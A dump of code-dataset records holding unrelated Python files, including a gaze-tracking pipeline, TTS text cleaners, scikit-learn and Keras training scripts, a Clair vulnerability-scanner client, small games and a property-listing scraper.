fd_model.preprocess_output(fdm_out, height, width)\n\n if(len(fdm_preprocessed_out) > 0):\n return fdm_preprocessed_out[0]\n else:\n None\n\ndef get_head_pose_estimate(cropped_face):\n hpe_preprocessed_in = hpe_model.preprocess_input(cropped_face)\n hpe_out = hpe_model.predict(hpe_preprocessed_in)\n return hpe_model.preprocess_output(hpe_out)\n\ndef get_facial_land_marks(cropped_face, width, height):\n fld_preprocessed_in = fld_model.preprocess_input(cropped_face)\n fld_out = fld_model.predict(fld_preprocessed_in)\n return fld_model.preprocess_output(fld_out, width, height)\n\ndef extract_eyes(land_marks, face, offset):\n left_eye_min = (int(land_marks[0]) - offset, int(land_marks[1]) - offset)\n left_eye_max = (int(land_marks[0]) + offset, int(land_marks[1]) + offset)\n\n right_eye_min = (int(land_marks[2]) - offset, int(land_marks[3]) - offset)\n right_eye_max = (int(land_marks[2]) + offset, int(land_marks[3]) + 
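ginter.py above builds its frequency axis by hand from the 0.1 ns sample spacing its comment mentions; np.fft.fftfreq derives the same axis directly from that spacing. A small sketch, with a random signal standing in for ch2['sumvol']:

import numpy as np

signal = np.random.randn(5000)                          # stand-in for ch2['sumvol']
spectrum = np.abs(np.fft.fft(signal))
freqs_ghz = np.fft.fftfreq(len(signal), d=1e-10) / 1e9  # 1e-10 s spacing -> GHz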
offset)\n\n\n left_eye = face[left_eye_min[1]: left_eye_max[1], left_eye_min[0]: left_eye_max[0]]\n right_eye = face[right_eye_min[1]: right_eye_max[1], right_eye_min[0]: right_eye_max[0]]\n\n return left_eye, right_eye\n\ndef get_gaze_vector(left_eye, right_eye, yaw_pitch_roll):\n ge_preproccessed_in = ge_model.preprocess_input(left_eye, right_eye, yaw_pitch_roll)\n ge_out = ge_model.predict(ge_preproccessed_in)\n ge_preprocessed_out = ge_model.preprocess_output(ge_out)\n return ge_preprocessed_out[:2]\n\ndef track_gaze(input, debug):\n\n if input == 'CAM':\n feed = InputFeeder(input_type='cam')\n else:\n feed=InputFeeder(input_type='video', input_file=input)\n feed.load_data()\n (width, height) = feed.dimensions()\n fps = feed.fps()\n logging.info('Video stream info: width: {}, height: {}, fps: {}'.format(width, height, fps))\n\n mouse_controller = MouseController('low', 'fast')\n \n if(debug):\n CODEC = cv2.VideoWriter_fourcc(*'DIVX')\n out = cv2.VideoWriter('debug_out.avi', CODEC, fps, (width,height))\n\n for batch in feed.next_batch():\n if(batch is None):\n logging.info('Video stream completed.')\n break\n \n face_coordinates = get_face_coordinates(batch, width, height)\n\n if(face_coordinates != None):\n (x_min,y_min), (x_max, y_max) = face_coordinates\n cropped_face = batch[y_min:y_max, x_min: x_max]\n\n (yaw, pitch, roll) = get_head_pose_estimate(cropped_face)\n\n fld_preprocessed_out = get_facial_land_marks(cropped_face, (x_max - x_min), (y_max - y_min))\n\n off_set = 30\n left_eye, right_eye = extract_eyes(fld_preprocessed_out, cropped_face, off_set)\n\n if(debug):\n center_of_face = (x_min + cropped_face.shape[1]/2, y_min + cropped_face.shape[0]/2, 0)\n batch = draw_axes(batch, center_of_face, yaw, pitch, roll, 50, 950)\n\n expected_shape = (off_set * 2, off_set * 2, 3)\n if(left_eye.shape == expected_shape and right_eye.shape == expected_shape):\n\n x, y = get_gaze_vector(left_eye, right_eye, (yaw, pitch, roll))\n\n if(not(debug)):\n mouse_controller.move(x, y)\n\n if(debug):\n batch = draw_gaze_vector(fld_preprocessed_out, (x_min, y_min), (x,y), batch)\n\n if(debug):\n out.write(batch)\n\n feed.close()\n if(debug):\n out.release()\n\nfd_model = None\nhpe_model = None \nfld_model = None\nge_model = None\n\ndef main():\n args = get_args()\n device = args.d\n extension = args.e\n\n global fd_model\n global hpe_model\n global fld_model\n global ge_model\n\n face_detection_model = '../models/intel/face-detection-adas-0001/FP16/face-detection-adas-0001.xml'\n fd_model = Face_Detection(model_name=face_detection_model, device = device, extensions=extension)\n fd_model.load_model()\n\n head_pose_estimation_model = '../models/intel/head-pose-estimation-adas-0001/FP16/head-pose-estimation-adas-0001.xml'\n hpe_model = Head_Pose_Estimation(model_name=head_pose_estimation_model, device=device, extensions=extension)\n hpe_model.load_model()\n\n facial_landmark_detection_model = '../models/intel/landmarks-regression-retail-0009/FP16/landmarks-regression-retail-0009.xml'\n fld_model = Facial_Landmarks_Detection(model_name=facial_landmark_detection_model, device=device, extensions=extension)\n fld_model.load_model()\n\n gaze_estimation_model = '../models/intel/gaze-estimation-adas-0002/FP16/gaze-estimation-adas-0002.xml'\n ge_model = Gaze_Estimation(model_name=gaze_estimation_model, device=device, extensions=extension)\n ge_model.load_model()\n\n logging.basicConfig(filename='debug.log', level=logging.DEBUG)\n logging.info('Arguments: device: {}, extension: {}, file: {}, 
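extract_eyes above slices a fixed 2*offset box around each landmark; near the image border the slice silently shrinks, which is why the pipeline later checks expected_shape before using the crops. A hedged helper that clamps the box to the image instead (crop_centered is not part of the source):

def crop_centered(img, cx, cy, offset):
    # Clamp the crop window to the image so border landmarks still yield a crop.
    h, w = img.shape[:2]
    x0, y0 = max(cx - offset, 0), max(cy - offset, 0)
    x1, y1 = min(cx + offset, w), min(cy + offset, h)
    return img[y0:y1, x0:x1]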
setDebug:{}'.format(device, extension, args.i, args.s))\n\n setDebug = False\n if(args.s == '1'):\n setDebug = True\n\n track_gaze(args.i, setDebug)\n\n\nif __name__ == \"__main__\":\n main()\n ","sub_path":"src/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":6434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"445853434","text":"\"\"\" from https://github.com/keithito/tacotron \"\"\"\n\nimport re\nfrom unidecode import unidecode\nfrom phonemizer import phonemize\nfrom .symbols import symbols_set\nfrom .numbers import normalize_numbers\n\n_whitespace_re = re.compile(r'\\s+')\n\n_abbreviations = [(re.compile('\\\\b%s\\\\.' % x[0], re.IGNORECASE), x[1]) for x in [\n ('mrs', 'misess'),\n ('mr', 'mister'),\n ('dr', 'doctor'),\n ('st', 'saint'),\n ('co', 'company'),\n ('jr', 'junior'),\n ('maj', 'major'),\n ('gen', 'general'),\n ('drs', 'doctors'),\n ('rev', 'reverend'),\n ('lt', 'lieutenant'),\n ('hon', 'honorable'),\n ('sgt', 'sergeant'),\n ('capt', 'captain'),\n ('esq', 'esquire'),\n ('ltd', 'limited'),\n ('col', 'colonel'),\n ('ft', 'fort'),\n]]\n\n\ndef expand_abbreviations(text):\n for regex, replacement in _abbreviations:\n text = re.sub(regex, replacement, text)\n return text\n\n\ndef expand_numbers(text):\n return normalize_numbers(text)\n\n\ndef lowercase(text):\n return text.lower()\n\n\ndef collapse_whitespace(text):\n return re.sub(_whitespace_re, ' ', text)\n\n\ndef to_phonemes(text: str, lang: str) -> str:\n phonemes = phonemize(text,\n language=lang,\n backend='espeak',\n strip=True,\n preserve_punctuation=True,\n with_stress=True,\n njobs=2,\n punctuation_marks=';:,.!?¡¿—…\"«»“”()',\n language_switch='remove-flags')\n phonemes = ''.join([p for p in phonemes if p in symbols_set])\n return phonemes\n\n\ndef convert_to_ascii(text):\n return unidecode(text)\n\n\ndef basic_cleaners(text):\n text = lowercase(text)\n text = collapse_whitespace(text)\n phonemes = to_phonemes(text, \"vi\")\n return phonemes\n\n\ndef transliteration_cleaners(text):\n text = convert_to_ascii(text)\n text = lowercase(text)\n text = collapse_whitespace(text)\n return text\n\n\ndef english_cleaners(text):\n text = convert_to_ascii(text)\n text = lowercase(text)\n text = expand_numbers(text)\n text = expand_abbreviations(text)\n text = collapse_whitespace(text)\n return text\n","sub_path":"Grad-TTS/text/cleaners.py","file_name":"cleaners.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"18881330","text":"import inline as inline\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nfrom matplotlib import style\r\nstyle.use('seaborn')\r\n\r\ndata=pd.read_csv(r'C:\\Users\\Sargis\\AppData\\Local\\Programs\\Python\\Python38-32\\kc_house_data.csv',encoding='latin')\r\nprint(data.T)\r\nprint(data['price'].describe())\r\nres=len(data[data['price']>7e5])/len(data)\r\nprint(res)\r\nprint(data.shape)\r\n\r\n\r\n# data['price'].plot(kind='hist',bins=60)\r\n# plt.show()\r\nprint(data.info())\r\npd.set_option('display.max_colwidth', -1)\r\npd.read_csv(r'C:\\Users\\Sargis\\AppData\\Local\\Programs\\Python\\Python38-32\\kc_house_data.csv',\r\n delimiter=';',\r\n encoding='latin')\r\nprint(data.T)\r\n# data.zipcode.value_counts().plot(kind='bar')\r\n# plt.show()\r\n\r\nuniq=data[['bedrooms',\r\n 'bathrooms',\r\n 'floors',\r\n 'view',\r\n 'condition',\r\n 'grade',\r\n 'yr_built',\r\n 
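to_phonemes in cleaners.py above wraps phonemizer's espeak backend (basic_cleaners hard-codes the language 'vi'). A minimal usage sketch, assuming espeak is installed:

from phonemizer import phonemize

print(phonemize("hello world",
                language="en-us",
                backend="espeak",
                strip=True,
                preserve_punctuation=True))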
'yr_renovated',\r\n ]].apply(lambda x: x.nunique(), axis=0)\r\n# print(uniq)\r\n\r\ndata = data.drop(['id', 'zipcode', 'date', 'sqft_basement'], axis=1, inplace=False)\r\nprint(data.shape)\r\n\r\n\r\nprint(sum(data.price>=7e5))\r\nprint(sum(data.price>=7e5)/data.shape[0])\r\ndata['high_price']=(data.price>7e5).astype('int64')\r\ndata.drop(['price'], axis=1, inplace=True)\r\nprint(len(data))\r\nprint(data.high_price.value_counts())\r\n\r\n\r\nfrom sklearn import preprocessing\r\nprint(data.mean(axis=0).round(3))\r\nprint(data.std(axis=0).round(3))\r\ndata.iloc[:,:-1]= preprocessing.scale(data.iloc[:,:-1])\r\nprint(data.mean(axis=0).round(3))\r\nprint(data.std(axis=0).round(3))\r\nprint(data.T)\r\n\r\nX,y = data.loc[:,data.columns != 'high_price'], data.loc[:,'high_price']\r\n\r\nfrom sklearn.metrics import accuracy_score,recall_score,precision_score,confusion_matrix,f1_score\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X,y,test_size = 0.20,random_state = 42)\r\n\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier\r\ndt= DecisionTreeClassifier()\r\ndt.fit(x_train,y_train)\r\ny_pred=dt.predict(x_test)\r\nDecisionTree_score=dt.score(x_test,y_test)\r\nprint(\"Accuracy of decision tree:\",dt.score(x_test,y_test))\r\nprint(precision_score(y_pred,y_test))\r\nprint(recall_score(y_pred,y_test))\r\n\r\n\r\nfrom sklearn.model_selection import train_test_split\r\ntrain_data,test_data,train_y,test_y=train_test_split(data.drop('high_price', axis=1),\r\n data['high_price'],\r\n test_size=0.2,\r\n random_state=15)\r\n\r\n\r\nprint(train_y.value_counts(normalize=True))\r\nprint(test_y.value_counts(normalize=True))\r\n\r\n\r\nimport sys\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import metrics\r\nfrom sklearn.metrics import confusion_matrix,roc_auc_score\r\n\r\n\r\ndTree = DecisionTreeClassifier()\r\nprint(dTree.fit(train_data,train_y))\r\npred=dTree.predict(test_data)\r\nprint(pred)\r\n\r\nprint(metrics.classification_report(test_y,pred))\r\n\r\nfrom sklearn.metrics import roc_curve, auc,f1_score\r\nfpr, tpr, _ = roc_curve(test_y, pred)\r\nroc_auc = auc(fpr, tpr)\r\nplt.plot(fpr, tpr, color='darkorange',)\r\nplt.plot(np.linspace(0,1,20),np.linspace(0,1,20), '-.')\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\nplt.title('Receiver operating characteristic (ROC)')\r\nprint('ROC curve (area = %0.2f)' % roc_auc)\r\nplt.show()\r\n\r\n\r\n","sub_path":"ClassificationKNN/ClassificationDecisionTree.py","file_name":"ClassificationDecisionTree.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460256164","text":"# -*- coding: utf-8 -*-\n\nfrom paclair.api.abstract_clair_requests import AbstractClairRequests\nfrom paclair.exceptions import PaclairException\n\n\nclass ClairRequestsV3(AbstractClairRequests):\n \"\"\"\n Request Clair helper\n \"\"\"\n\n _CLAIR_ANALYZE_URI = \"/ancestry/{}?with_vulnerabilities=1&with_features=1\"\n _CLAIR_POST_URI = \"/ancestry\"\n #_CLAIR_DELETE_URI = \"/v1/ancestry/{}\"\n\n def post_ancestry(self, ancestry):\n \"\"\"\n Post ancestry to Clair\n\n :param ancestry: ancestry to push\n \"\"\"\n json = ancestry.to_json()\n json['ancestry_name'] = ancestry.name.replace(':', '_')\n return self._request('POST', self._CLAIR_POST_URI, json=json)\n\n def get_ancestry(self, ancestry, statistics=False):\n \"\"\"\n Analyse an ancestry\n\n :param ancestry: ancestry (name) to analyse\n 
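ClassificationDecisionTree.py above standardizes the whole dataset with preprocessing.scale before splitting, which leaks test-set statistics into training. A hedged variant that fits the scaler on the training fold only, reusing X and y as defined above:

from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split

x_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)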
:param statistics: only return statistics\n :return: json\n \"\"\"\n response = self._request('GET', self._CLAIR_ANALYZE_URI.format(ancestry.replace(':', '_')))\n if statistics:\n return self.statistics(response.json())\n return response.json()\n\n def delete_ancestry(self, ancestry):\n \"\"\"\n Delete ancestry from Clair\n\n :param ancestry: ancestry to delete\n \"\"\"\n raise PaclairException(\"Delete is not available for V3 api\")\n\n @staticmethod\n def statistics(clair_json):\n \"\"\"\n Statistics from a json delivered by Clair\n\n :param clair_json: json delivered by Clair\n \"\"\"\n result = {}\n for feature in clair_json.get('ancestry', {}).get('features', []):\n for vuln in feature.get(\"vulnerabilities\", []):\n if \"fixedBy\" in vuln:\n result[vuln[\"severity\"]] = result.setdefault(vuln[\"severity\"], 0) + 1\n return result","sub_path":"paclair/api/clair_requests_v3.py","file_name":"clair_requests_v3.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117653803","text":"from keras.models import Sequential\nfrom keras.layers import Embedding, Flatten, Dense\nimport keras\nimport matplotlib.pyplot as plt\n\nimport DataPretreat\n\nif __name__ == \"__main__\":\n \"\"\"\n 解析IMDB文件数据\n \"\"\"\n DataPretreat.parse_imdb_data()\n \"\"\"\n 获取训练集和验证集\n \"\"\"\n x_train, y_train, x_val, y_val = DataPretreat.tokenize_IMDB(DataPretreat.maxlen,\n DataPretreat.training_samples,\n DataPretreat.validation_samples,\n DataPretreat.max_words)\n \"\"\"\n 解析Glove.6B文件\n \"\"\"\n DataPretreat.parse_GloVe()\n\n \"\"\"\n 计算嵌入矩阵\n \"\"\"\n embedding_matrix = DataPretreat.calculate_embedding_matrix()\n \"\"\"\n 神经网络结构设计\n \"\"\"\n model = Sequential()\n model.add(Embedding(DataPretreat.max_words, DataPretreat.embedding_dim, input_length=DataPretreat.maxlen,name='embed'))\n model.add(Flatten())\n model.add(Dense(32, activation='relu'))\n model.add(Dense(1, activation='sigmoid'))\n model.summary()\n\n \"\"\"\n 将与训练的词嵌入加入到Embedding层中,并冻结Embedding层,使其在训练的过程中不被更新\n \"\"\"\n model.layers[0].set_weights([embedding_matrix])\n model.layers[0].trainable = False\n\n \"\"\"\n 训练与评估\n \"\"\"\n\n model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\n history1 = model.fit(x_train, y_train,\n epochs=3,\n batch_size=32,\n validation_data=(x_val, y_val))\n \"\"\"\n 解冻Embedding层\n \"\"\"\n model.layers[0].trainable = True\n \"\"\"\n 再训练\n \"\"\"\n model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\n\n callbacks = [keras.callbacks.TensorBoard(log_dir='./log',\n histogram_freq=1,\n batch_size=32,\n embeddings_freq=1,\n embeddings_layer_names='embed',\n embeddings_data=x_train[:2000].astype('float32'),\n update_freq='epoch')]\n history2 = model.fit(x_train, y_train,\n epochs=3,\n batch_size=32,\n validation_data=(x_val, y_val),\n callbacks=callbacks)\n\n model.save('pre_trained_glove_and_colden_embedding_model.h5')\n\n \"\"\"\n 绘制loss and accurate\n \"\"\"\n acc = history1.history['acc'] + history2.history['acc']\n val_acc = history1.history['val_acc'] + history2.history['val_acc']\n loss = history1.history['loss'] + history2.history['loss']\n val_loss = history1.history['val_loss'] + history2.history['val_loss']\n\n epochs = range(1, len(acc)+1)\n\n plt.plot(epochs, acc, 'bo', label='Training acc')\n plt.plot(epochs, val_acc, 'b', label='Validation acc')\n plt.title('Training and validation accuracy')\n plt.legend()\n\n plt.figure()\n\n plt.plot(epochs, loss, 'bo', 
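statistics() above tallies severities by hand; collections.Counter expresses the same aggregation in one pass, counting only vulnerabilities that carry a fixedBy field, as the original does:

from collections import Counter

def severity_stats(clair_json):
    return Counter(v["severity"]
                   for feature in clair_json.get("ancestry", {}).get("features", [])
                   for v in feature.get("vulnerabilities", [])
                   if "fixedBy" in v)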
label='Training loss')\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n\n plt.show()\n\n\n","sub_path":"EmotionalPredictionExperiment3.py","file_name":"EmotionalPredictionExperiment3.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"295517250","text":"# Example - bank, 3 clerks, reneging (resources).py\nimport salabim as sim\n\n\nclass CustomerGenerator(sim.Component):\n def process(self):\n while True:\n Customer()\n yield self.hold(sim.Uniform(5, 15).sample())\n\n\nclass Customer(sim.Component):\n def process(self):\n if len(clerks.requesters()) >= 5:\n env.number_balked += 1\n env.print_trace('', '', 'balked')\n yield self.cancel()\n yield self.request(clerks, fail_delay=50)\n if self.failed():\n env.number_reneged += 1\n env.print_trace('', '', 'reneged')\n else:\n yield self.hold(30)\n self.release()\n\n\nenv = sim.Environment(trace=False)\nCustomerGenerator(name='customergenerator')\nenv.number_balked = 0\nenv.number_reneged = 0\nclerks = sim.Resource('clerk', 3)\n\nenv.run(till=50000)\n\nclerks.requesters().length.print_histogram(30, 0, 1)\nprint()\nclerks.requesters().length_of_stay.print_histogram(30, 0, 10)\nprint('number reneged', env.number_reneged)\nprint('number balked', env.number_balked)\n","sub_path":"Example - bank, 3 clerks, reneging (resources).py","file_name":"Example - bank, 3 clerks, reneging (resources).py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"11630211","text":"def words(word):\n wordcount={}\n\n if \"\\n\" in word:\n wordlist = word.splitlines()\n else:\n wordlist = word.split()\n\n print(\"\\nworld list after splitting \", wordlist,\"\\n\")\n\n for i_word in wordlist:\n try:\n key=int(i_word)\n wordcount[key] = wordlist.count(i_word)\n\n except ValueError:\n wordcount[i_word] = wordlist.count(i_word)\n\n\n return wordcount\n\n\n\n\nprint(\"from the My function \",words('testing 1 2 testing'))\nprint(\"from the Tests \",{'testing': 2, 1: 1, 2: 1})","sub_path":"words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"314826162","text":"from card import Card\nfrom deck import Deck\nfrom hand import Hand\n\nclass PyJackRound:\n def __init__(self, deck):\n self.player_hand, self.house_hand = self._init_hands(deck)\n self.player_is_done = False\n self.complete = False\n self.player_wins = None\n\n def hit(self, deck):\n self.player_hand.add_card(deck.draw_card())\n if self.player_hand.total > 21:\n self.stand(deck)\n \n def stand(self, deck):\n self.player_is_done = True\n self._run_house(deck)\n\n def _run_house(self, deck):\n while self.house_hand.total < 17:\n self.house_hand.add_card(deck.draw_card())\n self.complete = True\n self._decide_winner()\n\n def print_winner(self):\n if self.player_wins == None:\n print(\"Draw!\")\n elif self.player_wins:\n print(\"Player wins!\")\n else:\n print(\"House wins!\")\n\n def print_house_hand(self):\n print(\"*************** House ***************\")\n if self.player_is_done:\n print(\" \" + self.house_hand.string)\n print(\" Total: \" + str(self.house_hand.total))\n else:\n print(\" \" + str(self.house_hand.cards[0].value))\n print(\"**************************************\")\n\n def print_player_hand(self):\n print(\"My hand: \" + 
self.player_hand.string)\n print(\"Total: \" + str(self.player_hand.total))\n\n def _decide_winner(self):\n if (self.player_hand.total == self.house_hand.total) or (self.player_hand.total > 21 and self.house_hand.total > 21):\n self.player_wins = None\n elif (self.player_hand.total < 22 and self.house_hand.total > 21) or (self.player_hand.total < 22 and self.player_hand.total > self.house_hand.total):\n self.player_wins = True\n else:\n self.player_wins = False\n\n def _init_hands(self, deck):\n player_hand = Hand()\n house_hand = Hand()\n for _ in range(0, 2):\n player_hand.add_card(deck.draw_card())\n house_hand.add_card(deck.draw_card())\n return player_hand, house_hand\n","sub_path":"pyjackround.py","file_name":"pyjackround.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499840968","text":"import pickle\nimport os.path\nfrom . import timestamper\n\nclass menutimestamper():\n\t\n\tdef __init__(self):\n\t\tself.file = 'menu.out'\n\t\tif os.path.isfile(self.file):\n\t\t\tself.menu = pickle.load(open(self.file,'rb'))\n\t\telse:\n\t\t\tself.menu = []\n\t\t\tpickle.dump(self.menu, open(self.file,'wb'))\n\t\n\tdef add(self, name):\n\t\tprint('menutimestamper + add')\n\t\tpick = self.pick(name)\n\t\tif not pick:\n\t\t\ttb = timestamper.timestamper(name, self.file, self.menu)\n\t\t\tself.menu.insert(0, tb)\n\t\t\tpickle.dump(self.menu, open(self.file,'wb'))\n\t\t\t\n\tdef delete(self, name):\n\t\ti = 0\n\t\tfor x in self.menu:\n\t\t\tif x.real_name == name:\n\t\t\t\tself.menu.pop(i)\n\n\t\t\ti += 1\n\t\t\t\t\t\t\t\t\n\tdef pick(self, r):\n\t\tfor x in self.menu:\n\t\t\tif x.real_name == r:\n\t\t\t\treturn x\n\t\t\t\t\n\t\treturn None\n\t\t\n\tdef __repr__(self):\n\t\tr = 'Main Time Stamper\\n'\n\t\t\n\t\tfor x in self.menu:\n\t\t\tr += str(x)\n\t\t\n\t\treturn r","sub_path":"timestamper/menutimestamper.py","file_name":"menutimestamper.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"450343586","text":"# Rock Paper Scissors\n# Christopher \"Wuayna\" Cordero \n# 01 APR 2020\n# \n# \n# GOAL: Create a program that plays Rock, Paper, Scissors with you. \n# FLOW:\n# Prompt the user for either rock paper or scissors \n# Genereate rock paper scissors as the opponent\n# Compare the two to see who wins\n# FUNCS:\n# play_game\n# \n# \n# EXTRAS:\n# keep score \n# add username\n# \nimport random\n\n#Variables\nturn_is_Valid = False\nis_Winner = False\npossible_choices = ['r','s','p']\nchoice = ''\nopponent_choice = ''\n\n\n\n#Starting Prompt\ndef display_game():\n print(\"\\n\")\n print(\"Welcome to Rock, Paper, Scissors!\\n\")\n print(\"\\n\")\n print(\"r - Rock\")\n print(\"p - Paper\")\n print(\"s - Scissors\")\n return\n\n#Get choice from User\ndef play_game():\n global choice\n choice = input(\"\\nEnter your choice:\\n\")\n while choice not in possible_choices:\n choice = input(\"Enter your choice:\\n\")\n return\n \n#Play as computer\ndef opponent_Generator():\n global opponent_choice\n opponent_number = random.randrange(1,4)\n if opponent_number == 1:\n opponent_choice = 'r'\n elif opponent_number == 2:\n opponent_choice = 'p'\n elif opponent_number == 3:\n opponent_choice = 's'\n\n#Compare to find a winner\ndef check_Winner():\n global choice\n global opponent_choice\n if choice == 'r':\n if opponent_choice == 's':\n print(\"YOU WIN! 
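menutimestamper above opens its pickle file without ever closing the handles; the same load-or-initialize pattern with context managers (load_menu is an illustrative name):

import os
import pickle

def load_menu(path="menu.out"):
    if os.path.isfile(path):
        with open(path, "rb") as f:
            return pickle.load(f)
    menu = []
    with open(path, "wb") as f:
        pickle.dump(menu, f)  # create the file on first run, as the original does
    return menu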
The computer picked SCISSORS\\n\")\n elif opponent_choice == 'p':\n print(\"You lost. The computer picked PAPER\\n\")\n else:\n print(\"Its a tie. You both picked ROCK\\n\")\n elif choice == 'p':\n if opponent_choice == 'r':\n print(\"YOU WIN! The computer picked ROCK.\\n\")\n elif opponent_choice == 's':\n print(\"You lost. The computer picked SCISSORS\\n\")\n else:\n print(\"Its a tie. You both picked PAPER\\n\")\n elif choice == 's':\n if opponent_choice == 'p':\n print(\"YOU WIN! The computer picked PAPER\\n\")\n elif opponent_choice == 'r':\n print(\"You lost. The computer picked ROCK\\n\")\n else:\n print(\"Its a tie. You both picked SCISSORS\\n\")\n\n return\n\n\n\n#RUN THE GAME !\ndisplay_game()\nplay_game()\nopponent_Generator()\ncheck_Winner()","sub_path":"rockPaperScissors.py","file_name":"rockPaperScissors.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"583235057","text":"from app import db\nfrom app import ma\n\nclass Test(db.Model):\n \"\"\"Data model for testing SQLAlchemy.\"\"\"\n\n __tablename__ = 'test'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String())\n\n def __repr__(self):\n return ''.format(self.name)\n\nclass TestSchema(ma.Schema):\n class Meta:\n fields = (\"id\", \"name\")\n\ntest_schema = TestSchema()\ntests_schema = TestSchema(many=True)\n\nclass Stock(db.Model):\n \"\"\"Data model for stocks.\"\"\"\n\n __tablename__ = 'stock'\n id = db.Column(db.Integer, primary_key=True)\n equity = db.Column(db.String())\n info = db.Column(db.JSON)\n history = db.Column(db.JSON)\n history_alpha = db.Column(db.JSON)\n\n def __repr__(self):\n return f''\n\nclass StockSchema(ma.Schema):\n class Meta:\n fields = (\"id\", \"info\", \"history\", \"history_alpha\")\n\nstock_schema = StockSchema()\nstocks_schema = StockSchema(many=True)","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502015027","text":"import logging\n\nfrom daftlistings.listing import Listing\n\n\nclass PropertyForSale(Listing):\n def __init__(self, data_from_search=None, url=None):\n super().__init__(data_from_search, url)\n\n @property\n def formalised_address(self):\n if self.data_from_search:\n t = self.data_from_search.find(\n \"a\", {\"class\": \"PropertyInformationCommonStyles__addressCopy--link\"}\n )\n address = t.text\n else:\n address = self._ad_page_content.find(\n \"h1\", {\"class\": \"PropertyMainInformation__address\"}\n ).text.strip()\n\n s = address.split(\"-\")\n a = s[0].strip()\n if \"SALE AGREED\" in a:\n a = a.split()\n a = a[3:]\n a = \" \".join([str(x) for x in a])\n return a.lower().title().strip()\n\n @property\n def price(self):\n try:\n if self.data_from_search:\n price = self.data_from_search.find(\n \"strong\",\n {\"class\": \"PropertyInformationCommonStyles__costAmountCopy\"},\n ).text\n else:\n price = self._ad_page_content.find(\n \"strong\",\n {\"class\": \"PropertyInformationCommonStyles__costAmountCopy\"},\n ).text\n return int(\"\".join([str(s) for s in price if s.isdigit()]))\n except Exception as e:\n logging.error(\"Error getting price. 
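The branch ladder in check_Winner above collapses into a lookup table once the "X beats Y" relation is made explicit; a hedged sketch (BEATS and outcome are illustrative names):

BEATS = {'r': 's', 'p': 'r', 's': 'p'}  # key beats value

def outcome(player, opponent):
    if player == opponent:
        return 'tie'
    return 'win' if BEATS[player] == opponent else 'lose'

assert outcome('r', 's') == 'win' and outcome('r', 'p') == 'lose'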
Error message: \" + e.args[0])\n\n @property\n def images(self):\n uls = self._ad_page_content.find(\"div\", {\"id\": \"pbxl_carousel\"}).find(\"ul\")\n images = []\n if uls is None:\n return\n for li in uls.find_all(\"li\"):\n if li.find(\"img\")[\"src\"]:\n images.append(li.find(\"img\")[\"src\"])\n\n return images\n","sub_path":"daftlistings/property_for_sale.py","file_name":"property_for_sale.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327691037","text":"\"\"\"\nBruker cw ESR Data\n==================\n\nLoad cw Bruker ESR data, both 1D and 2D.\n\"\"\"\nfrom numpy import *\nimport pylab as plt\nfrom pyspecdata import *\n# %\n# load some 1D ESR data with harmonic + phase info\n\nd = find_file(\"S175R1a.*DHPC.*200304\",\n exp_type='francklab_esr/Sam')\nprint(\"here, we see the harmonic axis contains both harmonic and phase info\",d.getaxis('harmonic'))\nd.chunk_auto('harmonic','phase')\nplot(d['phase',0], alpha=0.5)\n\n# %\n# Next, let's load some power-saturation data\n\nd = find_file(\"Power.*Sat.*200303\",\n exp_type='francklab_esr/Sam')\nd.chunk_auto('harmonic','phase')\nfigure()\nimage(d['harmonic',0]['phase',0].C.setaxis('Microwave Power','#').set_units('Microwave Power','scan #'))\nplt.gca().set_aspect('auto')\nplt.show()\n","sub_path":"examples/esr_example.py","file_name":"esr_example.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"559209018","text":"import networkx as nx\nfrom graphviz import Source\nimport glob\nfrom networkx.readwrite import json_graph\nimport tf2_gnn\nimport tensorflow as tf\nimport numpy as np\nfrom typing import Dict\nimport time\nimport math\n\n\n\"\"\"\nPreprocess:\nNormalize node names and build a vocabulary {constant0,constant1,argument0,argument1,+,-,...}\nGive them unique ID\nGo through edges replace source and destination nodes by their unique ID. 
